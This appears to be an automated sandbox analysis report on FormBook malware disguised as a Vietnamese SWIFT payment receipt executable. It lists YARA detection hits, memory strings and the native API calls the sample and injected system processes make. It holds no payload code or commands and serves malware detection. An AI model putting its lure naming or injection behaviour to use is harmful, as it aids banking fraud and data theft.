Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.3376444530.00000000115A7000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe PID: 5920, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe PID: 1364, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: Process Memory Space: colorcpl.exe PID: 2820, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

.NET source code contains very large array initializations

Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.2ee18c8.0.raw.unpack, bg.cs	Large array initialization: : array initializer size 37143
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.d470000.6.raw.unpack, bg.cs	Large array initialization: : array initializer size 37143

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_012207D4 NtQueryInformationProcess,	0_2_012207D4
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_01224D08 NtQueryInformationProcess,	0_2_01224D08
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0041A360 NtCreateFile,	4_2_0041A360
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0041A410 NtReadFile,	4_2_0041A410
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0041A490 NtClose,	4_2_0041A490
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0041A540 NtAllocateVirtualMemory,	4_2_0041A540
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0041A35A NtCreateFile,	4_2_0041A35A
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0041A40A NtReadFile,	4_2_0041A40A
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222B60 NtClose,LdrInitializeThunk,	4_2_01222B60
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_01222BF0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222AD0 NtReadFile,LdrInitializeThunk,	4_2_01222AD0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_01222D30
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_01222D10
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_01222DF0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222DD0 NtDelayExecution,LdrInitializeThunk,	4_2_01222DD0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_01222C70
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_01222CA0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222F30 NtCreateSection,LdrInitializeThunk,	4_2_01222F30
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222FB0 NtResumeThread,LdrInitializeThunk,	4_2_01222FB0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222F90 NtProtectVirtualMemory,LdrInitializeThunk,	4_2_01222F90
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222FE0 NtCreateFile,LdrInitializeThunk,	4_2_01222FE0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	4_2_01222EA0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_01222E80
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01224340 NtSetContextThread,	4_2_01224340
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01224650 NtSuspendThread,	4_2_01224650
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222BA0 NtEnumerateValueKey,	4_2_01222BA0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222B80 NtQueryInformationFile,	4_2_01222B80
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222BE0 NtQueryValueKey,	4_2_01222BE0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222AB0 NtWaitForSingleObject,	4_2_01222AB0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222AF0 NtWriteFile,	4_2_01222AF0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222D00 NtSetInformationFile,	4_2_01222D00
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222DB0 NtEnumerateKey,	4_2_01222DB0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222C00 NtQueryInformationProcess,	4_2_01222C00
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222C60 NtCreateKey,	4_2_01222C60
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222CF0 NtOpenProcess,	4_2_01222CF0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222CC0 NtQueryVirtualMemory,	4_2_01222CC0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222F60 NtCreateProcessEx,	4_2_01222F60
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222FA0 NtQuerySection,	4_2_01222FA0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222E30 NtWriteVirtualMemory,	4_2_01222E30
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01222EE0 NtQueueApcThread,	4_2_01222EE0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01223010 NtOpenDirectoryObject,	4_2_01223010
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01223090 NtSetValueKey,	4_2_01223090
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012235C0 NtCreateMutant,	4_2_012235C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012239B0 NtGetContextThread,	4_2_012239B0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01223D10 NtOpenProcessToken,	4_2_01223D10
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01223D70 NtOpenThread,	4_2_01223D70
Source: C:\Windows\explorer.exe	Code function: 6_2_11590E12 NtProtectVirtualMemory,	6_2_11590E12
Source: C:\Windows\explorer.exe	Code function: 6_2_1158F232 NtCreateFile,	6_2_1158F232
Source: C:\Windows\explorer.exe	Code function: 6_2_11590E0A NtProtectVirtualMemory,	6_2_11590E0A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_05232D10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_05232DF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232DD0 NtDelayExecution,LdrInitializeThunk,	7_2_05232DD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232C60 NtCreateKey,LdrInitializeThunk,	7_2_05232C60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_05232C70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_05232CA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232F30 NtCreateSection,LdrInitializeThunk,	7_2_05232F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232FE0 NtCreateFile,LdrInitializeThunk,	7_2_05232FE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_05232EA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232B60 NtClose,LdrInitializeThunk,	7_2_05232B60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_05232BE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_05232BF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232AD0 NtReadFile,LdrInitializeThunk,	7_2_05232AD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052335C0 NtCreateMutant,LdrInitializeThunk,	7_2_052335C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05234650 NtSuspendThread,	7_2_05234650
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05234340 NtSetContextThread,	7_2_05234340
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232D30 NtUnmapViewOfSection,	7_2_05232D30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232D00 NtSetInformationFile,	7_2_05232D00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232DB0 NtEnumerateKey,	7_2_05232DB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232C00 NtQueryInformationProcess,	7_2_05232C00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232CF0 NtOpenProcess,	7_2_05232CF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232CC0 NtQueryVirtualMemory,	7_2_05232CC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232F60 NtCreateProcessEx,	7_2_05232F60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232FA0 NtQuerySection,	7_2_05232FA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232FB0 NtResumeThread,	7_2_05232FB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232F90 NtProtectVirtualMemory,	7_2_05232F90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232E30 NtWriteVirtualMemory,	7_2_05232E30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232E80 NtReadVirtualMemory,	7_2_05232E80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232EE0 NtQueueApcThread,	7_2_05232EE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232BA0 NtEnumerateValueKey,	7_2_05232BA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232B80 NtQueryInformationFile,	7_2_05232B80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232AB0 NtWaitForSingleObject,	7_2_05232AB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05232AF0 NtWriteFile,	7_2_05232AF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05233010 NtOpenDirectoryObject,	7_2_05233010
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05233090 NtSetValueKey,	7_2_05233090
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05233D10 NtOpenProcessToken,	7_2_05233D10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05233D70 NtOpenThread,	7_2_05233D70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052339B0 NtGetContextThread,	7_2_052339B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0329A360 NtCreateFile,	7_2_0329A360
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0329A540 NtAllocateVirtualMemory,	7_2_0329A540
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0329A410 NtReadFile,	7_2_0329A410
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0329A490 NtClose,	7_2_0329A490
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0329A35A NtCreateFile,	7_2_0329A35A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0329A40A NtReadFile,	7_2_0329A40A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_050CA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,	7_2_050CA036
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_050C9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	7_2_050C9BAF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_050CA042 NtQueryInformationProcess,	7_2_050CA042
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_050C9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_050C9BB2

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_01221058	0_2_01221058
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_012255D8	0_2_012255D8
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_01224B80	0_2_01224B80
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_012255C8	0_2_012255C8
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_01223471	0_2_01223471
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_012237A0	0_2_012237A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_01223790	0_2_01223790
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_01224B70	0_2_01224B70
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_01220FB6	0_2_01220FB6
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_05344454	0_2_05344454
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_053441A4	0_2_053441A4
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_05346D71	0_2_05346D71
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_053451B0	0_2_053451B0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_053451C0	0_2_053451C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_05388C5B	0_2_05388C5B
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_05388C80	0_2_05388C80
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_0A2A4670	0_2_0A2A4670
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_0A2A5E58	0_2_0A2A5E58
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_00401030	4_2_00401030
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_00402D87	4_2_00402D87
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_00402D90	4_2_00402D90
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0041EDAD	4_2_0041EDAD
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_00409E60	4_2_00409E60
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0041D7A0	4_2_0041D7A0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_00402FB0	4_2_00402FB0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E0100	4_2_011E0100
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0128A118	4_2_0128A118
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01278158	4_2_01278158
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B01AA	4_2_012B01AA
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A41A2	4_2_012A41A2
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012A81CC	4_2_012A81CC
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01282000	4_2_01282000
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012AA352	4_2_012AA352
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B03E6	4_2_012B03E6
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011FE3F0	4_2_011FE3F0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_01290274	4_2_01290274
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012702C0	4_2_012702C0
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011F0535	4_2_011F0535
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_012B0591	4_2_012B0591
